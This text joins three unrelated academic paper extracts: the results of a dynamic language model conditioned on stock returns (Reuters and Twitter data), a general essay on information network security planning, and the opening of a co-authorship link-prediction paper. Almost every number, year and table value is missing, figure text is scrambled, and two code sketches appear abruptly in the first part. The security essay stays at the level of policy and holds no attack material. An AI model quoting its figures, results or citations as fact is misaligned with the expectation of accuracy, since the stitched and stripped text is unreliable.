http://www.reuters.com dataset total # doc. avg. # doc. #days unigrams bigrams total # tokens size vocab. total # tokens size vocab. en:na , , , , , , , en:jp . , , , , , , fr , , , , , , , de , , , , , , , twitter , , , , , , table : statistics about the datasets. average number of documents (third column) is per day. sign $ (e.g., $goog, $msft, $aapl, etc.). these tags are generally used to indicate tweets about the stock market. we look at tweets from the period - - to - - ( days). as a result, we have approximately – tweets per day. we tokenized the tweets using the cmu ark tweetnlp tools, numerical terms are mapped to a single word, and all letters are downcased. we perform two experiments using unigram and bigram language models as the base models. for each dataset, we consider the top , unigrams after removing corpus-specific stopwords (the top words with highest frequencies). for the bigram experiments, we only use , words to limit the number of unique bigrams so that we can simulate experiments for the entire time horizon in a reason- able amount of time. in standard open-vocabulary language modeling experiments, the treatment of un- known words deserves care. we have opted for a controlled, closed-vocabulary experiment, since stan- dard smoothing techniques will almost surely interact with temporal dynamics and context in interesting ways that are out of scope in the present work. . baselines since this is a forecasting task, at each timestep, we only have access to data from previous timesteps. our model assumes that all words in all documents in a corpus come from a single multinomial distri- bution. therefore, we compare our approach to the corresponding base models (standard unigram and bi- gram language models) over the same vocabulary (for each stream). the first one maintains counts of every word and updates the counts at each timestep. this corresponds to a base model that uses all of the avail- able data up to the current timestep (“base all”). the second one replaces counts of every word with the https://www.ark.cs.cmu.edu/tweetnlp counts from the previous timestep (“base one”). ad- ditionally, we also compare with a base model whose counts decay exponentially (“base exp”). that is, the counts from previous timesteps decay by exp(−γs), where s is the distance between previous timesteps and the current timestep and γ is the decay constant. we set the decay constant γ = . we put a symmetric dirichlet prior on the counts (“add-one” smoothing); this is analogous to our treatment of the background frequencies n in our model. note that our model, similar to “base all,” uses all available data up to timestep t− when making predictions for timestep t. the window size c only determines which previ- ous timesteps’ models can be chosen for making a prediction today. the past models themselves are es- timated from all available data up to their respective timesteps. we also compare with two strong baselines: a lin- ear interpolation of “base one” models for the past week (“int. week”) and a linear interpolation of “base all” and “base one” (“int one all”). the interpolation weights are learned online using the normalized expo- nentiated gradient algorithm (kivinen and warmuth, ), which has been shown to enjoy a stronger regret guarantee compared to standard online gra- dient descent for learning a convex combination of weights. . results we evaluate the perplexity on unseen dataset to eval- uate the performance of our model. 
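Before giving the exact perplexity definition in the next paragraph, here is a minimal sketch of the three count-based baselines described above ("base all", "base one", and "base exp") with add-one smoothing. The decay constant gamma is left as a parameter since its value did not survive extraction; counts_by_day is a hypothetical (days × vocabulary) count matrix.

```python
import numpy as np

def baseline_distribution(counts_by_day, t, mode="all", gamma=1.0):
    """Predictive unigram distribution for day t from days 0..t-1 (sketch; requires t >= 1).

    counts_by_day : (T, V) word counts per day
    mode          : "all" - all counts up to day t-1
                    "one" - counts from day t-1 only
                    "exp" - counts decayed by exp(-gamma * s), s = distance from day t
    """
    past = counts_by_day[:t]
    if mode == "all":
        counts = past.sum(axis=0).astype(float)
    elif mode == "one":
        counts = past[-1].astype(float)
    else:  # "exp"
        s = np.arange(t, 0, -1)                       # distances t, t-1, ..., 1
        counts = (np.exp(-gamma * s)[:, None] * past).sum(axis=0)
    counts = counts + 1.0                             # symmetric Dirichlet ("add-one") smoothing
    return counts / counts.sum()
```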
specifically, we use per-word predictive perplexity: perplexity = exp ( − ∑t t= log p(wt | α,x :t,n :t− )∑t t= ∑ j∈v wt,j ) . note that the denominator is the number of tokens up to timestep t . lower perplexity is better. table and table show the perplexity results for dataset base all base one base exp int. week int. one all c = c = en:na , , , , , , , en:jp , , , , , , , fr , , , , , , , de , , , , , , , twitter , , , , , , , table : perplexity results for our five data streams in the unigram experiments. the base models in “base all,” “base one,” and “base exp” are unigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. the rightmost two columns are versions of our model. best results are highlighted in bold. dataset base all base one base exp int. week int. one all c = en:na , , , en:jp , , , fr , , , de , , , twitter , , , , table : perplexity results for our five data streams in the bigram experiments. the base models in “base all,” “base one,” and “base exp” are bigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. the rightmost column is a version of our model with c = . best results are highlighted in bold. each of the datasets for unigram and bigram experi- ments respectively. our model outperformed other competing models in all cases but one. recall that we only define the similarity function of world context as: f(xo,t,xo,k) = iff sign(ro,t) = sign(ro,k) and otherwise. a better similarity function (e.g., one that takes into account market size of the company and the magnitude of increase or decrease in the stock price) might be able to improve the performance fur- ther. we leave this for future work. furthermore, the variations can be captured using models from the past week. we discuss why increasing c from to did not improve performance of the model in more detail in § . . we can also see how the models performed over time. figure traces perplexity for four reuters news stream datasets. we can see that in some cases the performance of the “base all” model degraded over time, whereas our model is more robust to temporal in both experiments, in order to manage the time and space complexities of updating β, we apply a sparsity shrinkage tech- nique by using owl-qn (andrew and gao, ) when maxi- mizing it, with regularization constant set to . intuitively, this is equivalent to encouraging the deviation vector to be sparse (eisenstein et al., ). shifts. in the bigram experiments, we only ran our model with c = , since we need to maintain β in rv , instead of rv in the unigram model. the goal of this experiment is to determine whether our method still adds benefit to more expressive language mod- els. note that the weights of the linear interpolation models are also learned in an online fashion since there are no classical training, development, and test sets in our setting. since the “base one” model per- formed poorly in this experiment, the performance of the interpolated models also suffered. for example, the “int. one all” model needed time to learn that the “base one” model has to be downweighted (we started with all interpolated models having uniform weights), so it was not able to outperform even the “base all” model. . analysis and discussion it should not be surprising that conditioning on world-context reduces perplexity (cover and thomas, ). 
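For reference, the per-word predictive perplexity reported in the tables above can be computed as in the short sketch below; the inputs are the per-day predictive log-likelihoods and token counts accumulated while streaming.

```python
import numpy as np

def per_word_perplexity(daily_log_likelihoods, daily_token_counts):
    """exp( - sum_t log p(w_t | history) / sum_t |w_t| ); lower is better (sketch)."""
    total_ll = float(np.sum(daily_log_likelihoods))
    total_tokens = float(np.sum(daily_token_counts))
    return float(np.exp(-total_ll / total_tokens))
```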
a key attraction of our model, we believe, lies in the ability to inspect its parameters.

deviation coefficients. inspecting the model allows us to gain insight into temporal trends. we investigate the deviations learned by our model on the twitter dataset. examples are shown in figure (deviation coefficients β over time for google- and microsoft-related words on twitter with the unigram base model, c = ; significant changes, increases or decreases, in the returns of google and microsoft stocks are usually followed by increases in β of related words). the left plot shows β for four words related to google: goog, #goog, @google, google+. for comparison, we also show the return of google stock for the corresponding timestep (scaled and centered for readability, smoothed using loess (cleveland, ), denoted by rgoog in the plot). we can see that significant changes in the return of google stock (e.g., the rgoog spikes visible in the plot) occurred alongside an increase in β of google-related words. similar trends can also be observed for microsoft-related words in the right plot. the most significant loss of return of microsoft stock (the downward spike in the plot) is followed by a sudden sharp increase in β of the words #microsoft and microsoft.

feature coefficients. we can also inspect the learned feature coefficients α to investigate which stocks have higher associations with the text that is generated. our feature coefficients are designed to reflect which changes (or lack of changes) in stock prices influence the word distribution more, not which stocks are talked about more often. we find that the feature coefficients do not correlate with obvious company characteristics like market capitalization (firm size). for example, on the twitter dataset with bigram base models, the five stocks with the highest weights are: conagra foods inc., intel corp., bristol-myers squibb, frontier communications corp., and amazon.com inc. strongly negative weights tended to align with streams with less activity, suggesting that these were being used to smooth across all c days of history. a higher weight for stock o implies an increase in the probability of choosing models from previous timesteps s when the state of the world for the current timestep t and timestep s is the same (as represented by our similarity function) with respect to stock o (all other things being equal), and a decrease in probability for a lower weight.

selected models. besides feature coefficients, our model captures temporal shift by modeling similarity across the most recent c days. during inference, our model weights different word distributions from the past. the similarity is encoded in the pairwise features f(xt,xk) and the parameters α. figure (distributions of the selection probabilities of models from the previous c timesteps on the en:na dataset with the unigram base model; for simplicity, we show e-step modes; the histogram shows that the model tends to favor models from days closer to the current date) shows the distributions of the strongest-posterior models from previous timesteps, based on how far
one all en:jp timestep pe rp le xi ty base allbase allcompletecomplete int. one allint. one all fr timestep pe rp le xi ty base allbase all completecomplete int. one allint. one all de timestep pe rp le xi ty base allbase all completecomplete int. one allint. one all figure : perplexity over time for four reuters news streams (c = ) with bigram base models. in the past they are at the time of use, aggregated across rounds on the en:na dataset, for window size c = . it shows that the model tends to favor models from days closer to the current date, with the t− models selected the most, perhaps because the state of the world today is more similar to dates closer to today compare to more distant dates. the plot also explains why increasing c from to did not im- prove performance of the model, since most of the variation in our datasets can be captured with models from the past week. topics. latent topic variables have often figured heavily in approaches to dynamic language model- ing. in preliminary experiments incorporating single- membership topic variables (i.e., each document be- longs to a single topic, as in a mixture of unigrams), we saw no benefit to perplexity. incorporating top- ics also increases computational cost, since we must maintain and estimate one language model per topic, per timestep. it is straightforward to design mod- els that incorporate topics with single- or mixed- membership as in lda (blei et al., ), an in- teresting future direction. potential applications. dynamic language models like ours can be potentially useful in many applica- tions, either as a standalone language model, e.g., predictive text input, whose performance may de- pend on the temporal dimension; or as a component in applications like machine translation or speech recognition. additionally, the model can be seen as a step towards enhancing text understanding with numerical, contextual data. conclusion we presented a dynamic language model for stream- ing datasets that allows conditioning on observable real-world context variables, exemplified in our ex- periments by stock market data. we showed how to perform learning and inference in an online fashion for this model. our experiments showed the predic- tive benefit of such conditioning and online learning by comparing to similar models that ignore temporal dimensions and observable variables that influence the text. acknowledgements the authors thank several anonymous reviewers for help- ful feedback on earlier drafts of this paper and brendan o’connor for help with collecting twitter data. this re- search was supported in part by google, by computing resources at the pittsburgh supercomputing center, by national science foundation grant iis- , afosr grant fa , onr grant n , and by the intelligence advanced research projects activ- ity via department of interior national business center contract number d pc . the u.s. government is authorized to reproduce and distribute reprints for govern- mental purposes notwithstanding any copyright annotation thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as nec- essarily representing the official policies or endorsements, either expressed or implied, of iarpa, doi/nbc, or the u.s. government. references galen andrew and jianfeng gao. . scalable training of l -regularized log-linear models. in proc. of icml. david m. blei and john d. lafferty. . dynamic topic models. in proc. of icml. david m. blei, andrew y. ng, and michael i. jordan. . 
latent dirichlet allocation. journal of machine learning research, : – . sébastien bubeck. . introduction to online opti- mization. technical report, department of operations research and financial engineering, princeton univer- sity. nicolò cesa-bianchi and gábor lugosi. . prediction, learning, and games. cambridge university press. william s. cleveland. . robust locally weighted regression and smoothing scatterplots. journal of the american statistical association, ( ): – . thomas m. cover and joy a. thomas. . elements of information theory. john wiley & sons. john duchi and yoram singer. . efficient online and batch learning using forward backward splitting. journal of machine learning research, ( ): – . jacob eisenstein, brendan o’connor, noah a. smith, and eric p. xing. . a latent variable model for geographic lexical variation. in proc. of emnlp. jacob eisenstein, amr ahmed, and eric p. xing. . sparse additive generative models of text. in proc. of icml. amit goyal, hal daume iii, and suresh venkatasubrama- nian. . streaming for large scale nlp: language modeling. in proc. of hlt-naacl. matt hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. jour- nal of machine learning research, : – . antti honkela and harri valpola. . on-line varia- tional bayesian learning. in proc. of ica. tomoharu iwata, takeshi yamada, yasushi sakurai, and naonori ueda. . online multiscale dynamic topic models. in proc. of kdd. frederick jelinek. . statistical methods for speech recognition. mit press. jyrki kivinen and manfred k. warmuth. . expo- nentiated gradient versus gradient descent for linear predictors. information and computation, : – . victor lavrenko, matt schmill, dawn lawrie, paul ogilvie, david jensen, and james allan. . mining of concurrent text and time series. in proc. of kdd workshop on text mining. abby levenberg and miles osborne. . stream-based randomised language models for smt. in proc. of emnlp. abby levenberg, chris callison-burch, and miles os- borne. . stream-based translation models for sta- tistical machine translation. in proc. of hlt-naacl. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming b, ( ): – . david mimno and andrew mccallum. . topic mod- els conditioned on arbitrary features with dirichlet- multinomial regression. in proc. of uai. alexander rakhlin. . lecture notes on online learn- ing. technical report, department of statistics, the wharton school, university of pennsylvania. masaaki sato. . online model selection based on the variational bayes. neural computation, ( ): – . shai shalev-shwartz. . online learning and online convex optimization. foundations and trends in ma- chine learning, ( ): – . martin j. wainwright and michael i. jordan. . graph- ical models, exponential families, and variational infer- ence. foundations and trends in machine learning, ( – ): – . chong wang, david m. blei, and david heckerman. . continuous time dynamic topic models. in proc. of uai. chong wang, john paisley, and david m. blei. . on- line variational inference for the hierarchical dirichlet process. in proc. of aistats. martin zinkevich. . online convex programming and generalized infinitesimal gradient ascent. in proc. of icml. 
the establishment and implementation of information network security plan wang yuanyuan ideological and political department xi’an peihua university xi’an, , china e-mail: @qq.com abstract—this paper explains the idea of information security and discusses the establishment of the security system of information network. by using the information system security engineering method, we will establish and improve the network security plan and disaster recovery plan through strict organization and management, adequate financial support, strong talent support and deep technical guarantee. this paper puts forward the overall strategic goal of the "people-oriented, to prevent the main" network security and the overall plan to solve the network security problems. keywords-information security; network security; network security plan information is the main trend of development in contemporary society. the rapid development of information has a great impact on all aspects of the state and society. the information network is the nervous system of the information society. as the main infrastructure of information communication, the security problem has become a new security research hotspot. at present, the threat control of network security has been extended from the technical level to the management level to a great extent. i. an overview of information network security a. the concept of information network security and the idea of information security information network security is a security protection to prevent accidents and malicious attacks from the confidentiality, integrity, availability, controllability and non-repudiation of information itself and information system (network structure, application services, etc.). information network security is based on the physical layer and operation level of information network system, as well as the protection of information itself (data layer) and the level of attack (content level). the definition of the definition of network security at the technical level has been relatively complete. but the security of information network is a multi-dimensional, multi factor and multi-objective system. the establishment of a security system cannot rely solely on a single security mechanism and a variety of security services. access to the security of the entire information network system depends on the combination of multiple security mechanisms and a variety of security services. the concept of information security, which was produced in s, is the result of this idea. the security system of information security is to ensure the security of information system through the combination of level and depth protection, active and passive defense. the basic components are shown in figure . figure . information security system components in the system of "human centered", the information security system not only attaches importance to the adoption nd international conference on sensor network and computer engineering (icsnce ) copyright © , the authors. published by atlantis press. this is an open access article under the cc by-nc license (http://creativecommons.org/licenses/by-nc/ . /). advances in computer science research, volume of safety protection technology to protect information, but also emphasizes "preventive measures". active defense strategy is adopted to improve the ability of intrusion detection, vulnerability scanning, virus prevention, evaluation and audit, and the ability of rapid response and recovery after attack. b. 
the necessity of the research on the security of information network and the establishment of the security system the development of information network technology has accelerated the process of social information. the development of information has opened up a broad space for the application of the information network system. however, because of the irrational decision making for the development of technology for many years, the dependence of the state and the society and the public on the information network has gradually increased. information network is realizing information exchange and sharing. while greatly facilitating and enriching social life, network security has become an important factor affecting national security and social stability due to the vulnerability of network itself and human attacks and destruction. therefore, the current government of the world has taken information security as the focus of government work. many laws and regulations related to information security have been issued. the international organization for standardization has also developed a large number of safety standards. the information security system in china is also under construction. according to the goal of information security system in china, the design and implementation of information network security is comprehensively considered from the perspective of personnel, technology, management, legislation and operation. we have put forward the international safety standards and national security law as a guide, the use of information system security engineering method, through rigorous management, adequate funding, strong talent support, strong technical guarantee, establish and improve the network security plan and disaster recovery plan. based on the principle of "people first", we should achieve the goal of achieving all levels of safety assurance from border security to host safety, and strive to reduce the security threat to an acceptable level and effectively control risks. in the event of an invasion and other disasters, a full range of security strategic objectives with powerful recovery and counterattack capabilities are achieved. ii. network security plan a. objectives of the security plan according to the relevant national laws and regulations, as well as the strategic objectives of the information network security system, the network security plan is formulated. the aim is to strengthen the security of network security and establish a relatively safe information network environment. through the effective implementation of the plan, the following four major goals are achieved: ) establish a solid technical basis. we should educate and train technical groups with strong network security capabilities, establish relevant organizations, identify and improve the responsibilities of security personnel, and defend, detect, respond and recover against possible infringed networks. ) detection and response. detection and monitoring of network status should be timely. when an attack is found, it can react quickly and control the attack, and quickly restore or rebuild the normal running state of the network. ) defense and recovery. establish an efficient network defense system. the protection of key infrastructure is free from network invasion and virus invasion. reduce network vulnerability. it has strong defense and recovery capabilities for network attacks that have occurred and may occur. ) the necessary ability to counterattack. 
the existing security defense capability may not be enough to achieve the desired security target for the aggressive attack. it is necessary to have the ability to fight back, to prevent or even destroy the invaders' attempt. b. the main contents of the network security plan the security of information network issystem engineering. it not only needs solid technical support, but also is restricted by many factors, such as staffing, organization construction, management level, national legislation and so on. therefore, it is necessary to formulate advances in computer science research, volume a feasible and efficient network security plan according to the objective of the all-round network security strategy. we should reasonably allocate all kinds of resources and coordinate the relations in all aspects. the plan mainly includes eight points: ) to establish an active defense system. identify key infrastructure and interdependence. the software and hardware of the network system, which is the carrier of information dissemination, storage and processing in the vulnerability information network system, is an important infrastructure in the whole system. the interdependence between these facilities, especially the key infrastructure, is given full attention. it also conducts continuous vulnerability assessment and audit of the software and hardware systems used in the network. the ability of the invaders to destroy the critical infrastructure is estimated. develop a practical scheme to repair the vulnerability of the system and constantly modify and update the scheme. the evaluation and audit work will effectively destroy the invaders' attempt, which is bound to be the target of the invaders to carry out the attack. therefore, enough attention should be given to the safety of the assessment and audit work itself. ) detection of attacks and illegal intrusion, and pay attention to the collection of network security information. acknowledgement and correction of vulnerability can delay but not completely prevent malicious intrusion to the information network system. therefore, we need to carry out active defense at all levels of information network system, install and configure intrusion detection system, vulnerability scanning system, emergency response system and so on. the network management department should always pay attention to the collection of network security information, help the end users to resist attacks and prevent virus invasion. establish security management organization according to the network operation situation. a) safety management group. the group monitors and manages the entire network system and coordinates the work of the group and other groups. when attacked, the system is resumed with the other groups. b) emergency response team. responsible for security technology research and development, providing expert help to other groups to help them isolate, control, and resolve intrusion and attacks. in the case of attack, it is able to respond quickly and provide solutions. c) intrusion detection team. it is responsible for uninterrupted network security detection, and to collect security information legally, and provide security information for other groups at any time. the system backup work is done in collaboration with the operation department to support the recovery work after the attack. ) improve fast response and resilience response and recovery plans are formulated in each key infrastructure and key information of each category in the system. 
in the case of attack, it can be controlled in time, at least to ensure the minimum operation of the network, so that the work of other departments is less affected. when an attack occurs, the response is as follows: a) the rapid control of the intruders and blocking the access to the system. b) other more stringent defense measures are quickly launched. c) close the non-critical operating system. d) to enable the redundant takeover system in an emergency, and so on. after blocking the invasion, it is necessary to quickly restore or rebuild the system that is attacked or infected, and should have the corresponding recovery capability for different attacks. a) physical recovery, set up spare equipment, and dredge the network as soon as possible. b) the soft and hardware loopholes in the repair system. c) repair or replace damaged soft and hardware resources. d) recover the damaged data from the backup database as soon as possible. e) when the time and technical conditions are allowed, the intrusion information is analyzed and the source of invasion is traced. if necessary, information is provided to the public security organs. advances in computer science research, volume ) prioritization of key facilities and information, and level management. prioritize key facilities and information. the more sensitive information and the facilities that have a great impact on the operation, the more valuable it is. at the same time, they are more likely to encounter risks. therefore, we need to take more secure measures for facilities and information with high priority, so that intruders can't encroach on critical facilities and obtain confidential information in a general way. even if you get it, you can't parse the actual meaning of the information. ) pay attention to the collection and exchange of information, consistent with national law in order to ensure the security of the network, it is necessary to establish a reliable, unimpeded and special communication channel. establish a unified safety standard. the network management department should work closely with other departments to share security information and strengthen the research and development of security related technologies. ) pay attention to the training and employment of talents and strengthen the construction of institutions invite some information security experts to carry out continuous safety training for the existing network managers, actively hire and educate other personnel to make up for the lack of safety talents. in addition, we have to establish a team of part-time security administrators. ) strengthen the construction of the system and improve the management level under the guidance of national law, the current regulations and regulations are constantly revised and perfected. it provides a legal framework for the security of information network, and constantly improves the management level. ) strengthen the safety education for all kinds of personnel so as to make the public understand the necessity of improving the network security. improve the public awareness of network security, enhance the threat to the information system and their understanding and understanding of their characteristics. improve the ability of our defended invaders to attack before the disastrous events come iii. conclusion at present, the problem of network security has become a serious form that affects the national security and social stability. the implementation of network security plan has shown profound practical significance. 
in the long process of security assurance, the network security plan is just the first step, but we can be sure that the problem of network security will also receive more and more attention. reference [ ] gu huaxiang. the legal measures and enlightenment for the security of information security abroad [j]. reform of administrative managemen. ( ): - . [ ] ma minhu. internet security law [m]. xi'an jiao tong university press. . [ ] zhang lei. development of computer information network technology [j]. computer knowledge and technology. ( ): - . [ ] wei suming. discussion on the computer information network security technology and security measures [j]. electronics world. ( ): - . advances in computer science research, volume dual network embedding for representing research interests in the link prediction problem on co-authorship networks dual network embedding for representing research interests in the link prediction problem on co-authorship networks ilya makarov , , olga gerasimova , pavel sulimov and leonid e. zhukov school of data analysis and artificial intelligence, national research university higher school of economics, moscow, russia faculty of computer and information science, university of ljubljana, ljubljana, slovenia abstract we present a study on co-authorship network representation based on network embedding together with additional information on topic modeling of research papers and new edge embedding operator. we use the link prediction (lp) model for constructing a recommender system for searching collaborators with similar research interests. extracting topics for each paper, we construct keywords co-occurrence network and use its embedding for further generalizing author attributes. standard graph feature engineering and network embedding methods were combined for constructing co-author recommender system formulated as lp problem and prediction of future graph structure. we evaluate our survey on the dataset containing temporal information on national research university higher school of economics over years of research articles indexed in russian science citation index and scopus. our model of network representation shows better performance for stated binary classification tasks on several co-authorship networks. subjects artificial intelligence, data mining and machine learning, digital libraries, network science and online social networks, world wide web and web science keywords co-occurrence network, network embedding, machine learning, link prediction, recommender systems, co-authorship networks introduction nowadays, researchers struggle to find relevant scientific contributions among large variety of international conferences and journal articles. in order not to miss important improvements in various related fields of study, it is important to know the current state-of-art results while not reading all the papers tagged by research interests. one of the solutions is to search for the most “important” articles taking into account citation or centrality metrics of the paper and the authors with high influence on specific research field (liang, li & qian, ). however, such method does not include collaborative patterns and previous history of research publications in co-authorship. it also does not measure the author professional skills and the ability to publish research results according to paper influence metrics, for example, journal impact factor. 
we study the problem of finding collaborator depending on his/her research community, the quality of publications and structural patterns based on co-authorship network suggested by newman ( a, b). early unsupervised learning approaches how to cite this article makarov i, gerasimova o, sulimov p, zhukov le. . dual network embedding for representing research interests in the link prediction problem on co-authorship networks. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted december published january corresponding author ilya makarov, iamakarov@hse.ru academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright makarov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:iamakarov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ for community detection in research networks were studied in morel et al. ( ), cetorelli & peristiani ( ), yan & ding ( ), and velden & lagoze ( ). a review on social network analysis and network science can be found in wasserman & faust ( ), barabási & pósfai ( ), and scott ( ). we focus on the link prediction (lp) problem (liben-nowell & kleinberg, ) in order to predict links in temporal networks and restore missing edges in complex networks constructed over noisy data. the lp algorithms can be used to extract the missing link or to detect abnormal interactions in a given graph, however, the most suitable case is to use lp for predicting the most probable persons for future collaboration, which we state as a problem of recommending a co-author using lp ranking (li & chen, ). our model is designed to predict whether a pair of nodes in a network would have a connection. we can also predict the parameters of such an edge in terms of publication quality or number of collaborators corresponding to the predicted link (makarov et al., a, b). in general, lp algorithms are widely used in several applications, such as web linking (adafre & de rijke, ), search for real-world friends on social networks (backstrom & leskovec, ), citation recommender system for digital libraries (he et al., ). a complete list of existing applied lp techniques can be found in srinivas & mitra ( ). recently, the improvement of machine learning techniques shifted the attention from manual feature engineering to the vectorized information representation. such methods have been successfully applied for natural language processing and now are tested on network topology representation despite the fact that an arbitrary graph could not be described by its invariants. the approach of representing network vertices by a vector model depending on actor’s neighborhood and similar actors is called graph (network) embedding (perozzi, al-rfou & skiena, ). the current progress of theoretical and practical results on network embeddings (perozzi, al-rfou & skiena, ; tang et al., ; chang et al., ; grover & leskovec, ) shows state-of-art performance on such problems as multi-class actor classification and lp. although, the existing methods use not only structural equivalence and network homophily properties, but also the actor attributes, such as labels, texts, images, etc. a list of surveys on graph embedding models and applications can be found in cai, zheng & chang ( ), cui et al. 
( ), goyal & ferrara ( ), and chen et al. ( ). in this paper, we study a co-authorship recommender system based on co-authorship network where one or more of the coauthors belong to the national research university higher school of economics (nru hse) and the co-authored publications are only those indexed in scopus. we use machine learning techniques to predict new edges based on network embeddings (grover & leskovec, ; wu & lerman, ) and edge characteristics obtained from author attributes. we compare our approach with state-of-the-art algorithms for the lp problem using structural, attribute and combined feature space to evaluate the impact of the suggested approach on the binary classification task of predicting links in co-authorship network. such an obtained system could be applied for expert search, recommending collaborator or scientific adviser, and searching for relevant research publications similar to the work proposed in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ makarov, bulanov & zhukov ( ) and makarov et al. ( a). in what follows, we describe solution to the lp problem leading to evaluation of our recommender system based on co-authorship network embeddings and manually engineered features for hse researchers. related work link prediction the lp problem was stated in liben-nowell & kleinberg ( ), in which liben-nowell and kleinberg proposed using node proximity metrics. the evaluation of the proposed metrics for large co-authorship networks showed promising results for predicting future links based on network topology without any additional information on authors. unsupervised structural learning was proposed in tang & liu ( ). gao, denoyer & gallinari ( ) presented temporal lp based on node proximity and its attributes determined by the content using matrix factorization. two surveys on lp methods describe core approaches for feature engineering, bayesian approach and dimensionality reduction were presented in hasan & zaki ( ), lü & zhou ( ). survey on lp was published in wang et al. ( ). the simplest baseline solution using network homophily is based on common neighbors or other network similarity scores (liben-nowell & kleinberg, ). however, the gao et al. ( ) that the similarity measures are not robust to the network global properties and, thus, could noise the prediction model with similarity scores only. the impact of the attribute-based formation in social networks was considered in robins et al. ( ) and mcpherson, smith-lovin & cook ( ). all these observations require feature engineering depending on the domain. graph-based recommender systems formulated via lp problem were suggested in chen, li & huang ( ), liu & kou ( ), and li & chen ( ). in kossinets & watts ( ), studied the effect of homophily in a university community. they considered temporal co-authorship network accompanied with author attributes and concluded the influence of not only structural proximity, but also author homophily for the social network structure. another approach focusing on interdisciplinary collaboration inside the university was presented in cho & yu ( ). the authors used the existing co-authorship network and academic information for university of bristoll and proposed a new lp model for co-authorship prediction and recommendation. kong et al. ( ) developed a scientific paper recommender system called voprec. 
however, in contrast to our work they constructed vector representation of research papers in citation networks. their system uses both text information represented with word embedding to find papers of similar research interest and structural identity converted into vectors to find papers of similar network topology. to combine text and structural informations with the network, vector representation of article can be learned with network embedding. network embedding in general, knowledge retrieval and task-dependent feature extraction would require domain-specific expert to construct a real-value feature vector for nodes and edges makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ representation. the quality of such an approach will be influenced by particular tasks and expert work, while not being scalable for large noisy networks. recently, the theory of hidden representations has impacted on machine learning and artificial intelligence. it shifted the attention from manual feature engineering to defining loss function and then solving optimization task. the early works on network vectorized models were presented in local linear embedding (roweis & saul, ), isomap (tenenbaum, de silva & langford, ), laplacian eigenmap (belkin & niyogi, ), spectral clustering (tang & liu, ), mfa (yan et al., ), and grarep (cao, lu & xu, ). these works try to embed the networks into real-value vector space using several proximity metrics. however, development of representation learning for networks was in stagnation due to the non-robust and non-efficient machine learning methods of dimensionality reduction based on network matrix factorization or spectral decomposition. these methods were not applicable for large networks and noisy edge and attribute data providing low accuracy and having high time complexity of constructing embedding. the modern methods of network embedding try to improve the performance on several typical machine learning tasks using conditional representation of a node based on its local and global neighborhood defined via random walking. the first-order and second-order nodes proximity were suggested in line (tang et al., ) and sdne (wang, cui & zhu, ) models. generalizing this approach, deepwalk (perozzi, al-rfou & skiena, ) and node vec (grover & leskovec, ) algorithms use skip-gram model (mikolov et al., ) based on simulation of breadth-first sampling and depth-first sampling. although, in carstens et al. ( ), carstens et al. showed some drawbacks of node vec (grover & leskovec, ) graph embedding, it still remained competitive structural-only embedding for representing both, homophily and structural equivalence in the network. its generalization on global network representation learning from wu & lerman ( ) shows comparable results with the original model. several works cover the node attributes, such as label and text content (see tadw; yang et al., , lane; huang, li & hu, ). in tridnr paper, pan et al. ( ) proposed to separately learn structural embedding from deepwalk (perozzi, al-rfou & skiena, ) and content embedding via doc vec (le & mikolov, ). on the contrary, asne (liao et al., ) learns combined representations for structural and node attribute representation using end-to-end neural network. 
we focus on graph embedding and feature engineering methods applied to an lp task on a particular network, consisting of hse researchers co-authored at least one paper with additional attributes representing authors. using network features only fails to include the information about actors obtained from the other sources, thus decreasing efficiency of network embeddings. we aim to include information on feature space of author’s research interests using data from the scopus digital library containing manually input and automatically selected keywords for each research article. based on this information, we constructed keywords co-occurrence network and consider its embedding for further generalizing author attributes. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dataset description and preprocessing we use the nru hse portal (national research university higher school of economics, ) containing information on research papers co-authored by at least one hse researcher, which were later uploaded to the portal by one of co-authors. the hse database contains information on over , hse researchers published over , research papers. the portal site contains web interface for the researchers to extract metadata of publications for a given time period and could be used by external researchers. the database records contain information on title, list of authors, keywords, abstract, year and place, journal/conference and publishing agency, and indexing flags for scopus, web of science (wos) core collection and russian science citation index (rsci). unfortunately, the database has no interface for managing bibliography databases and has no integration with synchronizing of indexing digital libraries compared to scholar google or personal researcher profile management services such as researcherid or orcid. as a consequence, a large amount of noisy data occurs due to such problems as author name ambiguity or incorrect/incomplete information on the publications. in order to resolve the ambiguity, we considered standard disambiguation approaches for predicting necessity to merge authors. we used levenshtein distance (useful for records with one-two error letters) for abbreviated author last and first names and then validated by two thresholds whether to merge two authors with the same abbreviation in the database based on cosine similarity and common neighbors metrics. the threshold values have been found manually via validation on small labeled set of ambiguous records. the number of authors with ambiguous writing does not exceed % of the whole database. we have also removed all non-hse authors due to lack of information on their publications in hse dataset. we also retrieved the scopus database of research papers co-authored by researchers from nru hse and indexed by elsevier ( ). the database contains information on paper author list, document title, year, source title, volume, issue, pages, source and document type, doi, author keywords, index keywords. we also added the information on research interests based on scopus subject categories for the journals, in which authors have published their articles. we manually inputted the research interest list according to rsci categorization in order to fill the lack of keywords and attributes for the papers. 
